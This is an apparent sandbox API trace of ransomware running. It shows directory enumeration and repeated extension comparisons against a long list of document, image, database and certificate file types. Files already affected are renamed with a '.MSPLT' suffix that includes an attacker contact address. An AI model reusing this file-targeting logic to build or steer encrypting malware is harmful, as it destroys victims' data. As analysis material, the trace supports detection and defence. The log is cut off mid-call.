[0167.299] lstrcmpiW (lpString1=".pcx", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".pdd") returned 4 [0167.299] lstrcmpiW (lpString1=".pdd", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".pdf") returned 4 [0167.299] lstrcmpiW (lpString1=".pdf", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".pdp") returned 4 [0167.299] lstrcmpiW (lpString1=".pdp", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".pef") returned 4 [0167.299] lstrcmpiW (lpString1=".pef", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".pem") returned 4 [0167.299] lstrcmpiW (lpString1=".pem", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".pff") returned 4 [0167.299] lstrcmpiW (lpString1=".pff", lpString2="SPLT") returned -1 [0167.299] lstrlenW (lpString=".pfm") returned 4 [0167.300] lstrcmpiW (lpString1=".pfm", lpString2="SPLT") returned -1 [0167.300] lstrlenW (lpString=".pfx") returned 4 [0167.300] lstrcmpiW (lpString1=".pfx", lpString2="SPLT") returned -1 [0167.300] lstrlenW (lpString=".pgm") returned 4 [0167.300] lstrcmpiW (lpString1=".pgm", lpString2="SPLT") returned -1 [0167.300] lstrlenW (lpString=".php") returned 4 [0167.300] lstrcmpiW (lpString1=".php", lpString2="SPLT") returned -1 [0167.300] lstrlenW (lpString=".php3") returned 5 [0167.300] lstrcmpiW (lpString1=".php3", lpString2="MSPLT") returned -1 [0167.300] lstrlenW (lpString=".php4") returned 5 [0167.300] lstrcmpiW (lpString1=".php4", lpString2="MSPLT") returned -1 [0167.300] lstrlenW (lpString=".php5") returned 5 [0167.300] lstrcmpiW (lpString1=".php5", lpString2="MSPLT") returned -1 [0167.300] lstrlenW (lpString=".phtml") returned 6 [0167.300] lstrcmpiW (lpString1=".phtml", lpString2=".MSPLT") returned 1 [0167.300] lstrlenW (lpString=".pict") returned 5 [0167.300] lstrcmpiW (lpString1=".pict", lpString2="MSPLT") returned -1 [0167.300] lstrlenW (lpString=".pl") returned 3 [0167.300] lstrcmpiW (lpString1=".pl", lpString2="PLT") returned -1 [0167.300] lstrlenW (lpString=".pls") returned 4 [0167.300] lstrcmpiW (lpString1=".pls", lpString2="SPLT") returned -1 [0167.300] lstrlenW (lpString=".pm") returned 3 [0167.300] lstrcmpiW (lpString1=".pm", lpString2="PLT") returned -1 [0167.300] lstrlenW (lpString=".png") returned 4 [0167.300] lstrcmpiW (lpString1=".png", lpString2="SPLT") returned -1 [0167.300] lstrlenW (lpString=".pnm") returned 4 [0167.300] lstrcmpiW (lpString1=".pnm", lpString2="SPLT") returned -1 [0167.300] lstrlenW (lpString=".pot") returned 4 [0167.300] lstrcmpiW (lpString1=".pot", lpString2="SPLT") returned -1 [0167.301] lstrlenW (lpString=".potm") returned 5 [0167.301] lstrcmpiW (lpString1=".potm", lpString2="MSPLT") returned -1 [0167.301] lstrlenW (lpString=".potx") returned 5 [0167.301] lstrcmpiW (lpString1=".potx", lpString2="MSPLT") returned -1 [0167.301] lstrlenW (lpString=".ppa") returned 4 [0167.301] lstrcmpiW (lpString1=".ppa", lpString2="SPLT") returned -1 [0167.301] lstrlenW (lpString=".ppam") returned 5 [0167.301] lstrcmpiW (lpString1=".ppam", lpString2="MSPLT") returned -1 [0167.301] lstrlenW (lpString=".ppm") returned 4 [0167.301] lstrcmpiW (lpString1=".ppm", lpString2="SPLT") returned -1 [0167.301] lstrlenW (lpString=".pps") returned 4 [0167.301] lstrcmpiW (lpString1=".pps", lpString2="SPLT") returned -1 [0167.301] lstrlenW (lpString=".ppsm") returned 5 [0167.301] lstrcmpiW (lpString1=".ppsm", lpString2="MSPLT") returned -1 [0167.301] lstrlenW (lpString=".ppt") returned 4 [0167.301] lstrcmpiW (lpString1=".ppt", lpString2="SPLT") returned -1 [0167.301] lstrlenW (lpString=".pptm") returned 5 [0167.301] lstrcmpiW (lpString1=".pptm", lpString2="MSPLT") returned -1 [0167.301] lstrlenW (lpString=".pptx") returned 5 [0167.301] lstrcmpiW (lpString1=".pptx", lpString2="MSPLT") returned -1 [0167.301] lstrlenW (lpString=".prn") returned 4 [0167.301] lstrcmpiW (lpString1=".prn", lpString2="SPLT") returned -1 [0167.301] lstrlenW (lpString=".ps") returned 3 [0167.301] lstrcmpiW (lpString1=".ps", lpString2="PLT") returned -1 [0167.301] lstrlenW (lpString=".psb") returned 4 [0167.301] lstrcmpiW (lpString1=".psb", lpString2="SPLT") returned -1 [0167.301] lstrlenW (lpString=".psd") returned 4 [0167.301] lstrcmpiW (lpString1=".psd", lpString2="SPLT") returned -1 [0167.301] lstrlenW (lpString=".pst") returned 4 [0167.302] lstrcmpiW (lpString1=".pst", lpString2="SPLT") returned -1 [0167.302] lstrlenW (lpString=".ptx") returned 4 [0167.302] lstrcmpiW (lpString1=".ptx", lpString2="SPLT") returned -1 [0167.302] lstrlenW (lpString=".pub") returned 4 [0167.302] lstrcmpiW (lpString1=".pub", lpString2="SPLT") returned -1 [0167.302] lstrlenW (lpString=".pwm") returned 4 [0167.302] lstrcmpiW (lpString1=".pwm", lpString2="SPLT") returned -1 [0167.302] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58dd53c9, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58dd53c9, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58dfb734, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1894, dwReserved0=0x0, dwReserved1=0x0, cFileName="oobe_2017_09_07_03_08_57_737.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="OOBE_2~1.MSP")) returned 1 [0167.302] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58dfb734, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58dfb734, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARTNE~1.MSP")) returned 1 [0167.302] FindNextFileW (in: hFindFile=0x801ed8, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58dfb734, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58dfb734, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e47bf6, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x140, dwReserved0=0x0, dwReserved1=0x0, cFileName="PartnerSetupCompleteResult.log.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="PARTNE~1.MSP")) returned 0 [0167.302] FindClose (in: hFindFile=0x801ed8 | out: hFindFile=0x801ed8) returned 1 [0167.303] HeapFree (in: hHeap=0x710000, dwFlags=0x0, lpMem=0x3e90058 | out: hHeap=0x710000) returned 1 [0167.303] FindNextFileW (in: hFindFile=0x802118, lpFindFileData=0x391fa7c | out: lpFindFileData=0x391fa7c*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x957833a7, ftLastWriteTime.dwHighDateTime=0x1d3273b, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x240000, cFileName="SafeOS", cAlternateFileName="")) returned 1 [0167.303] RtlAllocateHeap (HeapHandle=0x710000, Flags=0x0, Size=0xfffe) returned 0x3e90058 [0167.303] FindFirstFileW (in: lpFileName="C:\\$GetCurrent\\SafeOS\\*", lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x802098 [0167.303] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x54acc791, ftCreationTime.dwHighDateTime=0x1d3273a, ftLastAccessTime.dwLowDateTime=0x9575af11, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0167.303] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x9568f13f, ftCreationTime.dwHighDateTime=0x1d3273b, ftLastAccessTime.dwLowDateTime=0x9568f13f, ftLastAccessTime.dwHighDateTime=0x1d3273b, ftLastWriteTime.dwLowDateTime=0xfb529700, ftLastWriteTime.dwHighDateTime=0x1d2fc76, nFileSizeHigh=0x0, nFileSizeLow=0x232c8, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentOOBE.dll", cAlternateFileName="GETCUR~1.DLL")) returned 1 [0167.303] FindNextFileW (in: hFindFile=0x802098, lpFindFileData=0x391f800 | out: lpFindFileData=0x391f800*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x58e6ddfa, ftCreationTime.dwHighDateTime=0x1d6097d, ftLastAccessTime.dwLowDateTime=0x58e6ddfa, ftLastAccessTime.dwHighDateTime=0x1d6097d, ftLastWriteTime.dwLowDateTime=0x58e96aba, ftLastWriteTime.dwHighDateTime=0x1d6097d, nFileSizeHigh=0x0, nFileSizeLow=0x1a0, dwReserved0=0x0, dwReserved1=0x0, cFileName="GetCurrentRollback.ini.id-B4197730.[supermetasploit@aol.com].MSPLT", cAlternateFileName="GETCUR~1.MSP")) returned 1 [0167.304] lstrlenW (lpString="GetCurrentRollback.ini.id-B4197730.[supermetasploit@aol.com].MSPLT") returned 66 [0167.304] lstrlenW (lpString=".1cd") returned 4 [0167.304] lstrcmpiW (lpString1=".1cd", lpString2="SPLT") returned -1 [0167.304] lstrlenW (lpString=".3ds") returned 4 [0167.304] lstrcmpiW (lpString1=".3ds", lpString2="SPLT") returned -1 [0167.304] lstrlenW (lpString=".3fr") returned 4 [0167.304] lstrcmpiW (lpString1=".3fr", lpString2="SPLT") returned -1 [0167.304] lstrlenW (lpString=".3g2") returned 4 [0167.304] lstrcmpiW (lpString1=".3g2", lpString2="SPLT") returned -1 [0167.304] lstrlenW (lpString=".3gp") returned 4 [0167.304] lstrcmpiW (lpString1=".3gp", lpString2="SPLT") returned -1 [0167.304] lstrlenW (lpString=".7z") returned 3 [0167.304] lstrcmpiW (lpString1=".7z", lpString2="PLT") returned -1 [0167.304] lstrlenW (lpString=".accda") returned 6 [0167.304] lstrcmpiW (lpString1=".accda", lpString2=".MSPLT") returned -1 [0167.304] lstrlenW (lpString=".accdb") returned 6 [0167.304] lstrcmpiW (lpString1=".accdb", lpString2=".MSPLT") returned -1 [0167.304] lstrlenW (lpString=".accdc") returned 6 [0167.304] lstrcmpiW (lpString1=".accdc", lpString2=".MSPLT") returned -1 [0167.304] lstrlenW (lpString=".accde") returned 6 [0167.304] lstrcmpiW (lpString1=".accde", lpString2=".MSPLT") returned -1 [0167.304] lstrlenW (lpString=".accdt") returned 6 [0167.304] lstrcmpiW (lpString1=".accdt", lpString2=".MSPLT") returned -1 [0167.304] lstrlenW (lpString=".accdw") returned 6 [0167.304] lstrcmpiW (lpString1=".accdw", lpString2=".MSPLT") returned -1 [0167.304] lstrlenW (lpString=".adb") returned 4 [0167.305] lstrcmpiW (lpString1=".adb", lpString2="SPLT") returned -1 [0167.305] lstrlenW (lpString=".adp") returned 4 [0167.305] lstrcmpiW (lpString1=".adp", lpString2="SPLT") returned -1 [0167.305] lstrlenW (lpString=".ai") returned 3 [0167.305] lstrcmpiW (lpString1=".ai", lpString2="PLT") returned -1 [0167.305] lstrlenW (lpString=".ai3") returned 4 [0167.305] lstrcmpiW (lpString1=".ai3", lpString2="SPLT") returned -1 [0167.305] lstrlenW (lpString=".ai4") returned 4 [0167.305] lstrcmpiW (lpString1=".ai4", lpString2="SPLT") returned -1 [0167.305] lstrlenW (lpString=".ai5") returned 4 [0167.305] lstrcmpiW (lpString1=".ai5", lpString2="SPLT") returned -1 [0167.305] lstrlenW (lpString=".ai6") returned 4 [0167.305] lstrcmpiW (lpString1=".ai6", lpString2="SPLT") returned -1 [0167.305] lstrlenW (lpString=".ai7") returned 4 [0167.305] lstrcmpiW (lpString1=".ai7", lpString2="SPLT") returned -1 [0167.305] lstrlenW (lpString=".ai8") returned 4 [0167.305] lstrcmpiW (lpString1=".ai8", lpString2="SPLT") returned -1 [0167.305] lstrlenW (lpString=".anim") returned 5 [0167.305] lstrcmpiW (lpString1=".anim", lpString2="MSPLT") returned -1 [0167.305] lstrlenW (lpString=".arw") returned 4 [0167.305] lstrcmpiW (lpString1=".arw", lpString2="SPLT") returned -1 [0167.305] lstrlenW (lpString=".as") returned 3 [0167.305] lstrcmpiW (lpString1=".as", lpString2="PLT") returned -1 [0167.305] lstrlenW (lpString=".asa") returned 4 [0167.305] lstrcmpiW (lpString1=".asa", lpString2="SPLT") returned -1 [0167.305] lstrlenW (lpString=".asc") returned 4 [0167.305] lstrcmpiW (lpString1=".asc", lpString2="SPLT") returned -1 [0167.305] lstrlenW (lpString=".ascx") returned 5 [0167.306] lstrcmpiW (lpString1=".ascx", lpString2="MSPLT") returned -1 [0167.306] lstrlenW (lpString=".asm") returned 4 [0167.306] lstrcmpiW (lpString1=".asm", lpString2="SPLT") returned -1 [0167.306] lstrlenW (lpString=".asmx") returned 5 [0167.306] lstrcmpiW (lpString1=".asmx", lpString2="MSPLT") returned -1 [0167.306] lstrlenW (lpString=".asp") returned 4 [0167.306] lstrcmpiW (lpString1=".asp", lpString2="SPLT") returned -1 [0167.306] lstrlenW (lpString=".aspx") returned 5 [0167.306] lstrcmpiW (lpString1=".aspx", lpString2="MSPLT") returned -1 [0167.306] lstrlenW (lpString=".asr") returned 4 [0167.306] lstrcmpiW (lpString1=".asr", lpString2="SPLT") returned -1 [0167.306] lstrlenW (lpString=".asx") returned 4 [0167.306] lstrcmpiW (lpString1=".asx", lpString2="SPLT") returned -1 [0167.306] lstrlenW (lpString=".avi") returned 4 [0167.306] lstrcmpiW (lpString1=".avi", lpString2="SPLT") returned -1 [0167.306] lstrlenW (lpString=".avs") returned 4 [0167.306] lstrcmpiW (lpString1=".avs", lpString2="SPLT") returned -1 [0167.306] lstrlenW (lpString=".backup") returned 7 [0167.306] lstrcmpiW (lpString1=".backup", lpString2="].MSPLT") returned -1 [0167.306] lstrlenW (lpString=".bak") returned 4 [0167.306] lstrcmpiW (lpString1=".bak", lpString2="SPLT") returned -1 [0167.306] lstrlenW (lpString=".bay") returned 4 [0167.306] lstrcmpiW (lpString1=".bay", lpString2="SPLT") returned -1 [0167.306] lstrlenW (lpString=".bd") returned 3 [0167.306] lstrcmpiW (lpString1=".bd", lpString2="PLT") returned -1 [0167.306] lstrlenW (lpString=".bin") returned 4 [0167.307] lstrcmpiW (lpString1=".bin", lpString2="SPLT") returned -1 [0167.307] lstrlenW (lpString=".bmp") returned 4 [0167.307] lstrcmpiW (lpString1=".bmp", lpString2="SPLT") returned -1 [0167.307] lstrlenW (lpString=".bz2") returned 4 [0167.307] lstrcmpiW (lpString1=".bz2", lpString2="SPLT") returned -1 [0167.307] lstrlenW (lpString=".c") returned 2 [0167.307] lstrcmpiW (lpString1=".c", lpString2="LT") returned -1 [0167.307] lstrlenW (lpString=".cdr") returned 4 [0167.307] lstrcmpiW (lpString1=".cdr", lpString2="SPLT") returned -1 [0167.307] lstrlenW (lpString=".cer") returned 4 [0167.307] lstrcmpiW (lpString1=".cer", lpString2="SPLT") returned -1 [0167.307] lstrlenW (lpString=".cf") returned 3 [0167.307] lstrcmpiW (lpString1=".cf", lpString2="PLT") returned -1 [0167.307] lstrlenW (lpString=".cfc") returned 4 [0167.307] lstrcmpiW (lpString1=".cfc", lpString2="SPLT") returned -1 [0167.307] lstrlenW (lpString=".cfm") returned 4 [0167.307] lstrcmpiW (lpString1=".cfm", lpString2="SPLT") returned -1 [0167.307] lstrlenW (lpString=".cfml") returned 5 [0167.307] lstrcmpiW (lpString1=".cfml", lpString2="MSPLT") returned -1 [0167.307] lstrlenW (lpString=".cfu") returned 4 [0167.307] lstrcmpiW (lpString1=".cfu", lpString2="SPLT") returned -1 [0167.307] lstrlenW (lpString=".chm") returned 4 [0167.307] lstrcmpiW (lpString1=".chm", lpString2="SPLT") returned -1 [0167.307] lstrlenW (lpString=".cin") returned 4 [0167.307] lstrcmpiW (lpString1=".cin", lpString2="SPLT") returned -1 [0167.307] lstrlenW (lpString=".class") returned 6 [0167.307] lstrcmpiW (lpString1=".class", lpString2=".MSPLT") returned -1 [0167.307] lstrlenW (lpString=".clx") returned 4 [0167.308] lstrcmpiW (lpString1=".clx", lpString2="SPLT") returned -1 [0167.308] lstrlenW (lpString=".config") returned 7 [0167.308] lstrcmpiW (lpString1=".config", lpString2="].MSPLT") returned -1 [0167.308] lstrlenW (lpString=".cpp") returned 4 [0167.308] lstrcmpiW (lpString1=".cpp", lpString2="SPLT") returned -1 [0167.308] lstrlenW (lpString=".cr2") returned 4 [0167.308] lstrcmpiW (lpString1=".cr2", lpString2="SPLT") returned -1 [0167.308] lstrlenW (lpString=".crt") returned 4 [0167.308] lstrcmpiW (lpString1=".crt", lpString2="SPLT") returned -1 [0167.308] lstrlenW (lpString=".crw") returned 4 [0167.308] lstrcmpiW (lpString1=".crw", lpString2="SPLT") returned -1 [0167.308] lstrlenW (lpString=".cs") returned 3 [0167.308] lstrcmpiW (lpString1=".cs", lpString2="PLT") returned -1 [0167.308] lstrlenW (lpString=".css") returned 4 [0167.308] lstrcmpiW (lpString1=".css", lpString2="SPLT") returned -1 [0167.308] lstrlenW (lpString=".csv") returned 4 [0167.308] lstrcmpiW (lpString1=".csv", lpString2="SPLT") returned -1 [0167.308] lstrlenW (lpString=".cub") returned 4 [0167.308] lstrcmpiW (lpString1=".cub", lpString2="SPLT") returned -1 [0167.308] lstrlenW (lpString=".dae") returned 4 [0167.308] lstrcmpiW (lpString1=".dae", lpString2="SPLT") returned -1 [0167.308] lstrlenW (lpString=".dat") returned 4 [0167.308] lstrcmpiW (lpString1=".dat", lpString2="SPLT") returned -1 [0167.308] lstrlenW (lpString=".db") returned 3 [0167.308] lstrcmpiW (lpString1=".db", lpString2="PLT") returned -1 [0167.308] lstrlenW (lpString=".dbf") returned 4 [0167.308] lstrcmpiW (lpString1=".dbf", lpString2="SPLT") returned -1 [0167.308] lstrlenW (lpString=".dbx") returned 4 [0167.308] lstrcmpiW (lpString1=".dbx", lpString2="SPLT") returned -1 [0167.309] lstrlenW (lpString=".dc3") returned 4 [0167.309] lstrcmpiW (lpString1=".dc3", lpString2="SPLT") returned -1 [0167.309] lstrlenW (lpString=".dcm") returned 4 [0167.309] lstrcmpiW (lpString1=".dcm", lpString2="SPLT") returned -1 [0167.309] lstrlenW (lpString=".dcr") returned 4 [0167.309] lstrcmpiW (lpString1=".dcr", lpString2="SPLT") returned -1 [0167.309] lstrlenW (lpString=".der") returned 4 [0167.309] lstrcmpiW (lpString1=".der", lpString2="SPLT") returned -1 [0167.309] lstrlenW (lpString=".dib") returned 4 [0167.309] lstrcmpiW (lpString1=".dib", lpString2="SPLT") returned -1 [0167.309] lstrlenW (lpString=".dic") returned 4 [0167.309] lstrcmpiW (lpString1=".dic", lpString2="SPLT") returned -1 [0167.309] lstrlenW (lpString=".dif") returned 4 [0167.309] lstrcmpiW (lpString1=".dif", lpString2="SPLT") returned -1 [0167.309] lstrlenW (lpString=".divx") returned 5 [0167.309] lstrcmpiW (lpString1=".divx", lpString2="MSPLT") returned -1 [0167.309] lstrlenW (lpString=".djvu") returned 5 [0167.309] lstrcmpiW (lpString1=".djvu", lpString2="MSPLT") returned -1 [0167.309] lstrlenW (lpString=".dng") returned 4 [0167.309] lstrcmpiW (lpString1=".dng", lpString2="SPLT") returned -1 [0167.309] lstrlenW (lpString=".doc") returned 4 [0167.309] lstrcmpiW (lpString1=".doc", lpString2="SPLT") returned -1 [0167.309] lstrlenW (lpString=".docm") returned 5 [0167.309] lstrcmpiW (lpString1=".docm", lpString2="MSPLT") returned -1 [0167.309] lstrlenW (lpString=".docx") returned 5 [0167.309] lstrcmpiW (lpString1=".docx", lpString2="MSPLT") returned -1 [0167.309] lstrlenW (lpString=".dot") returned 4 [0167.309] lstrcmpiW (lpString1=".dot", lpString2="SPLT") returned -1 [0167.309] lstrlenW (lpString=".dotm") returned 5 [0167.310] lstrcmpiW (lpString1=".dotm", lpString2="MSPLT") returned -1 [0167.310] lstrlenW (lpString=".dotx") returned 5 [0167.310] lstrcmpiW (lpString1=".dotx", lpString2="MSPLT") returned -1 [0167.310] lstrlenW (lpString=".dpx") returned 4 [0167.310] lstrcmpiW (lpString1=".dpx", lpString2="SPLT") returned -1 [0167.310] lstrlenW (lpString=".dqy") returned 4 [0167.310] lstrcmpiW (lpString1=".dqy", lpString2="SPLT") returned -1 [0167.310] lstrlenW (lpString=".dsn") returned 4 [0167.310] lstrcmpiW (lpString1=".dsn", lpString2="SPLT") returned -1 [0167.310] lstrlenW (lpString=".dt") returned 3 [0167.310] lstrcmpiW (lpString1=".dt", lpString2="PLT") returned -1 [0167.310] lstrlenW (lpString=".dtd") returned 4 [0167.310] lstrcmpiW (lpString1=".dtd", lpString2="SPLT") returned -1 [0167.310] lstrlenW (lpString=".dwg") returned 4 [0167.310] lstrcmpiW (lpString1=".dwg", lpString2="SPLT") returned -1 [0167.310] lstrlenW (lpString=".dwt") returned 4 [0167.310] lstrcmpiW (lpString1=".dwt", lpString2="SPLT") returned -1 [0167.310] lstrlenW (lpString=".dx") returned 3 [0167.310] lstrcmpiW (lpString1=".dx", lpString2="PLT") returned -1 [0167.310] lstrlenW (lpString=".dxf") returned 4 [0167.310] lstrcmpiW (lpString1=".dxf", lpString2="SPLT") returned -1 [0167.310] lstrlenW (lpString=".edml") returned 5 [0167.310] lstrcmpiW (lpString1=".edml", lpString2="MSPLT") returned -1 [0167.310] lstrlenW (lpString=".efd") returned 4 [0167.310] lstrcmpiW (lpString1=".efd", lpString2="SPLT") returned -1 [0167.310] lstrlenW (lpString=".elf") returned 4 [0167.310] lstrcmpiW (lpString1=".elf", lpString2="SPLT") returned -1 [0167.310] lstrlenW (lpString=".emf") returned 4 [0167.311] lstrcmpiW (lpString1=".emf", lpString2="SPLT") returned -1 [0167.311] lstrlenW (lpString=".emz") returned 4 [0167.311] lstrcmpiW (lpString1=".emz", lpString2="SPLT") returned -1 [0167.311] lstrlenW (lpString=".epf") returned 4 [0167.311] lstrcmpiW (lpString1=".epf", lpString2="SPLT") returned -1 [0167.311] lstrlenW (lpString=".eps") returned 4 [0167.311] lstrcmpiW (lpString1=".eps", lpString2="SPLT") returned -1 [0167.311] lstrlenW (lpString=".epsf") returned 5 [0167.311] lstrcmpiW (lpString1=".epsf", lpString2="MSPLT") returned -1 [0167.311] lstrlenW (lpString=".epsp") returned 5 [0167.311] lstrcmpiW (lpString1=".epsp", lpString2="MSPLT") returned -1 [0167.311] lstrlenW (lpString=".erf") returned 4 [0167.311] lstrcmpiW (lpString1=".erf", lpString2="SPLT") returned -1 [0167.311] lstrlenW (lpString=".exr") returned 4 [0167.311] lstrcmpiW (lpString1=".exr", lpString2="SPLT") returned -1 [0167.311] lstrlenW (lpString=".f4v") returned 4 [0167.311] lstrcmpiW (lpString1=".f4v", lpString2="SPLT") returned -1 [0167.311] lstrlenW (lpString=".fido") returned 5 [0167.311] lstrcmpiW (lpString1=".fido", lpString2="MSPLT") returned -1 [0167.311] lstrlenW (lpString=".flm") returned 4 [0167.311] lstrcmpiW (lpString1=".flm", lpString2="SPLT") returned -1 [0167.311] lstrlenW (lpString=".flv") returned 4 [0167.311] lstrcmpiW (lpString1=".flv", lpString2="SPLT") returned -1 [0167.311] lstrlenW (lpString=".frm") returned 4 [0167.311] lstrcmpiW (lpString1=".frm", lpString2="SPLT") returned -1 [0167.311] lstrlenW (lpString=".fxg") returned 4 [0167.311] lstrcmpiW (lpString1=".fxg", lpString2="SPLT") returned -1 [0167.311] lstrlenW (lpString=".geo") returned 4 [0167.312] lstrcmpiW (lpString1=".geo", lpString2="SPLT") returned -1 [0167.312] lstrlenW (lpString=".gif") returned 4 [0167.312] lstrcmpiW (lpString1=".gif", lpString2="SPLT") returned -1 [0167.312] lstrlenW (lpString=".grs") returned 4 [0167.312] lstrcmpiW (lpString1=".grs", lpString2="SPLT") returned -1 [0167.312] lstrlenW (lpString=".gz") returned 3 [0167.312] lstrcmpiW (lpString1=".gz", lpString2="PLT") returned -1 [0167.312] lstrlenW (lpString=".h") returned 2 [0167.312] lstrcmpiW (lpString1=".h", lpString2="LT") returned -1 [0167.312] lstrlenW (lpString=".hdr") returned 4 [0167.312] lstrcmpiW (lpString1=".hdr", lpString2="SPLT") returned -1 [0167.312] lstrlenW (lpString=".hpp") returned 4 [0167.312] lstrcmpiW (lpString1=".hpp", lpString2="SPLT") returned -1 [0167.312] lstrlenW (lpString=".hta") returned 4 [0167.312] lstrcmpiW (lpString1=".hta", lpString2="SPLT") returned -1 [0167.312] lstrlenW (lpString=".htc") returned 4 [0167.312] lstrcmpiW (lpString1=".htc", lpString2="SPLT") returned -1 [0167.312] lstrlenW (lpString=".htm") returned 4 [0167.312] lstrcmpiW (lpString1=".htm", lpString2="SPLT") returned -1 [0167.312] lstrlenW (lpString=".html") returned 5 [0167.312] lstrcmpiW (lpString1=".html", lpString2="MSPLT") returned -1 [0167.312] lstrlenW (lpString=".icb") returned 4 [0167.312] lstrcmpiW (lpString1=".icb", lpString2="SPLT") returned -1 [0167.312] lstrlenW (lpString=".ics") returned 4 [0167.312] lstrcmpiW (lpString1=".ics", lpString2="SPLT") returned -1 [0167.312] lstrlenW (lpString=".iff") returned 4 [0167.312] lstrcmpiW (lpString1=".iff", lpString2="SPLT") returned -1 [0167.312] lstrlenW (lpString=".inc") returned 4 [0167.313] lstrcmpiW (lpString1=".inc", lpString2="SPLT") returned -1 [0167.313] lstrlenW (lpString=".indd") returned 5 [0167.313] lstrcmpiW (lpString1=".indd", lpString2="MSPLT") returned -1 [0167.313] lstrlenW (lpString=".ini") returned 4 [0167.313] lstrcmpiW (lpString1=".ini", lpString2="SPLT") returned -1 [0167.313] lstrlenW (lpString=".iqy") returned 4 [0167.313] lstrcmpiW (lpString1=".iqy", lpString2="SPLT") returned -1 [0167.313] lstrlenW (lpString=".j2c") returned 4 [0167.313] lstrcmpiW (lpString1=".j2c", lpString2="SPLT") returned -1 [0167.313] lstrlenW (lpString=".j2k") returned 4 [0167.313] lstrcmpiW (lpString1=".j2k", lpString2="SPLT") returned -1 [0167.313] lstrlenW (lpString=".java") returned 5 [0167.313] lstrcmpiW (lpString1=".java", lpString2="MSPLT") returned -1 [0167.313] lstrlenW (lpString=".jp2") returned 4 [0167.313] lstrcmpiW (lpString1=".jp2", lpString2="SPLT") returned -1 [0167.313] lstrlenW (lpString=".jpc") returned 4 [0167.313] lstrcmpiW (lpString1=".jpc", lpString2="SPLT") returned -1 [0167.313] lstrlenW (lpString=".jpe") returned 4 [0167.313] lstrcmpiW (lpString1=".jpe", lpString2="SPLT") returned -1 [0167.313] lstrlenW (lpString=".jpeg") returned 5 [0167.313] lstrcmpiW (lpString1=".jpeg", lpString2="MSPLT") returned -1 [0167.313] lstrlenW (lpString=".jpf") returned 4 [0167.313] lstrcmpiW (lpString1=".jpf", lpString2="SPLT") returned -1 [0167.313] lstrlenW (lpString=".jpg") returned 4 [0167.313] lstrcmpiW (lpString1=".jpg", lpString2="SPLT") returned -1 [0167.313] lstrlenW (lpString=".jpx") returned 4 [0167.313] lstrcmpiW (lpString1=".jpx", lpString2="SPLT") returned -1 [0167.313] lstrlenW (lpString=".js") returned 3 [0167.313] lstrcmpiW (lpString1=".js", lpString2="PLT") returned -1 [0167.314] lstrlenW (lpString=".jsf") returned 4 [0167.314] lstrcmpiW (lpString1=".jsf", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".json") returned 5 [0167.314] lstrcmpiW (lpString1=".json", lpString2="MSPLT") returned -1 [0167.314] lstrlenW (lpString=".jsp") returned 4 [0167.314] lstrcmpiW (lpString1=".jsp", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".kdc") returned 4 [0167.314] lstrcmpiW (lpString1=".kdc", lpString2="SPLT") returned -1 [0167.314] lstrlenW (lpString=".kmz") returned 4 [0167.314] lstrcmpiW 